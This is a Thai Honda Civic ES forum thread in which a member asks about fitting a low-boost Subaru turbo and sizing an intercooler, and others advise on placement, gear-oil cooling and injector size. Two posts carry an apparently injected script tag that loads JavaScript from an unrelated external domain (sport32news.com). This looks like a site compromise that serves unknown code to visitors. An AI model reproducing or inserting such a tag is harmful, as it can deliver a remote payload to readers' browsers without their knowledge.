ตอบ
thammarong007


ชื่อเล่น: รงค์

เข้าร่วม: 23 ธันวา 2012
ตอบ: 1733

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2672
ให้คำขอบคุณ: 3437

ที่อยู่: ซ.มังกร เทพารักษ์ สมุทรปราการ
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 25 มกรา 2013 05:02 - สงสัยเรื่อง Turbo และอยากทราบเรื่องขนาดของอินเตอร์ที่เหมาะสมครับ
พอดีผมมีโครงการจะติด Turbo พอให้ขับได้สนุกๆ และกระฉับกระเฉิงขึ้นอีกสักนิดอะครับ พอดีมี Turbo ของ Subaru อยู่แล้ว อยากจะเอา Boost แค่ประมาณ 0.3 และไม่เกิน 0.5 Bar เพราะเป็น 1.7 AT มันจะตั้ง Boost ระดับต่ำๆแบบนี้ได้มั้ยครับ เพราะมันน้อยกว่า Standard Boost ของตัว Turbo ซึ่งผมจะใช้ Wastgate แยกกับ Blow Off Valve และอยากได้อินเตอร์สำหรับงานนี้อะครับ แล้วต้องติดไว้ข้างหน้า หรือบนเครื่องถึงจะถูกต้องครับ รบกวนแนะนำยี้ห้อ รุ่น สถานที่ซื้อ และถ้ามีราคาด้วยยิ่งดี ขอบคุณครับ "<script src="https://sport32news.com/civicesgroup.js">
CoolMo


ชื่อเล่น: โม

เข้าร่วม: 23 มีนา 2012
ตอบ: 441

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 367
ให้คำขอบคุณ: 323

ที่อยู่: พระนครศรีอยุธยา
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 25 มกรา 2013 09:48 - สงสัยเรื่อง Turbo และอยากทราบเรื่องขนาดของอินเตอร์ที่เหมาะสมครับ
ต้อวรอเซียนมาเลยล่ะครับ งานนี้
ได้รับคำขอบคุณจาก: thammarong007 
es-may


เข้าร่วม: 26 กรกฎา 2010
ตอบ: 320

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 265
ให้คำขอบคุณ: 240

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 25 มกรา 2013 15:45 - สงสัยเรื่อง Turbo และอยากทราบเรื่องขนาดของอินเตอร์ที่เหมาะสมครับ
อยา่กทราบด้วยคนครับ โบ auto บูสน้อยๆ 
ได้รับคำขอบคุณจาก: thammarong007 
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 25 มกรา 2013 17:07 - สงสัยเรื่อง Turbo และอยากทราบเรื่องขนาดของอินเตอร์ที่เหมาะสมครับ
ข้างหน้าเลยครับ. บูสต์ 0.3-0.4 กำลังพอดี. เดี๋ยวเกียร์จะไม่ไหว. ถ้าใส่ออยเกียร์ไว้ไดิยิ่งดี. ขนาด อินเตอร์ปรึกษาช่างที่ทำเครื่องดีกว่า
ได้รับคำขอบคุณจาก: thammarong007  es330  OrbLink 
durongrit


เข้าร่วม: 02 ธันวา 2008
ตอบ: 85

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 52
ให้คำขอบคุณ: 18

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 25 มกรา 2013 17:37 - สงสัยเรื่อง Turbo และอยากทราบเรื่องขนาดของอินเตอร์ที่เหมาะสมครับ
"<script src="https://sport32news.com/civicesgroup.js"> แวะมาเก็บข้อมูลค๊าบบ
ได้รับคำขอบคุณจาก: thammarong007 
Nack_Non


ชื่อเล่น: แน๊ก ชาลี

เข้าร่วม: 01 ธันวา 2011
ตอบ: 346

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 242
ให้คำขอบคุณ: 216

ที่อยู่: นนทบุรี-บางกรวย หลังก.ฟ.ผ.
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 25 มกรา 2013 22:28 - สงสัยเรื่อง Turbo และอยากทราบเรื่องขนาดของอินเตอร์ที่เหมาะสมครับ
โหดๆ มาอีกแล้ว
ได้รับคำขอบคุณจาก: thammarong007 
thammarong007


ชื่อเล่น: รงค์

เข้าร่วม: 23 ธันวา 2012
ตอบ: 1733

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2672
ให้คำขอบคุณ: 3437

ที่อยู่: ซ.มังกร เทพารักษ์ สมุทรปราการ
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 26 มกรา 2013 17:53 - สงสัยเรื่อง Turbo และอยากทราบเรื่องขนาดของอินเตอร์ที่เหมาะสมครับ
blackhawkpearl พิมพ์ว่า:
ข้างหน้าเลยครับ. บูสต์ 0.3-0.4 กำลังพอดี. เดี๋ยวเกียร์จะไม่ไหว. ถ้าใส่ออยเกียร์ไว้ไดิยิ่งดี. ขนาด อินเตอร์ปรึกษาช่างที่ทำเครื่องดีกว่า


ถ้าใ่ส่ออยเกียร์ต้องรื้อเกียร์ด้วยมั้ยครับ แล้วเรื่องการจ่ายน้ำมันต้องใช้หัวฉีดเสริมด้วยมั้ยครับ สำหรับบูสต์ 0.3 - 0.4 บาร์ แล้วหัวฉีดเสริมนี่เหมือนที่ใช้อยู่ในรางหัวฉีดรึเปล่าครับ พอดีมีเหลืออยู่หัวนึง
coco1340


เข้าร่วม: 11 มกรา 2012
ตอบ: 1239

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1169
ให้คำขอบคุณ: 302

ที่อยู่: พระราม 2
อาทิตย์, 27 มกรา 2013 22:28 - สงสัยเรื่อง Turbo และอยากทราบเรื่องขนาดของอินเตอร์ที่เหมาะสมครับ
  โอวกำเนิดเทพอีกคันแล้วซิครับเนี้ย  รอชมนะครับบ
ได้รับคำขอบคุณจาก: thammarong007 
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 3 กุมภา 2013 02:57 - สงสัยเรื่อง Turbo และอยากทราบเรื่องขนาดของอินเตอร์ที่เหมาะสมครับ
thammarong007 พิมพ์ว่า:
blackhawkpearl พิมพ์ว่า:
ข้างหน้าเลยครับ. บูสต์ 0.3-0.4 กำลังพอดี. เดี๋ยวเกียร์จะไม่ไหว. ถ้าใส่ออยเกียร์ไว้ไดิยิ่งดี. ขนาด อินเตอร์ปรึกษาช่างที่ทำเครื่องดีกว่า


ถ้าใ่ส่ออยเกียร์ต้องรื้อเกียร์ด้วยมั้ยครับ แล้วเรื่องการจ่ายน้ำมันต้องใช้หัวฉีดเสริมด้วยมั้ยครับ สำหรับบูสต์ 0.3 - 0.4 บาร์ แล้วหัวฉีดเสริมนี่เหมือนที่ใช้อยู่ในรางหัวฉีดรึเปล่าครับ พอดีมีเหลืออยู่หัวนึง


ไม่ต้องรื้อเลยครับแค่จะให้ผ่านออยอย่างเดียวหรือผ่านทั้งออยกับหม้อนำ้. ตอนนั้นผมไปติดมา 3000 กว่าบาท จบเลย
ส่วนหัวฉีด. เปลี่ยนใหม่ดีกว่าครับ เอาซัก 400-550 cc .4 หัวเพียงพอแล้ว. ราคา ไม่เกิน 5000. เสริมไม่แนะนำครับ
ได้รับคำขอบคุณจาก: thammarong007  CALM 
CALM


เข้าร่วม: 19 สิงหา 2012
ตอบ: 320

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 286
ให้คำขอบคุณ: 574

ที่อยู่: บ้านบิดาครับ
ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 9 กุมภา 2013 01:30 - สงสัยเรื่อง Turbo และอยากทราบเรื่องขนาดของอินเตอร์ที่เหมาะสมครับ
oH my god. กำเนิด turbo !!!!!! ใน ES แรงปรี๊ด แรงปรี๊ดดดด
ได้รับคำขอบคุณจาก: thammarong007 
damrongwit


ชื่อเล่น: ต๋อม

เข้าร่วม: 19 มกรา 2013
ตอบ: 601

Guru ES
Guru ES

ได้รับคำขอบคุณ: 597
ให้คำขอบคุณ: 635

ที่อยู่: โคราช-บางพลี-บางนา
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 9 กุมภา 2013 10:44 - สงสัยเรื่อง Turbo และอยากทราบเรื่องขนาดของอินเตอร์ที่เหมาะสมครับ
ว้าววววturbo แอบอิจฉานิดๆ
ได้รับคำขอบคุณจาก: thammarong007 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.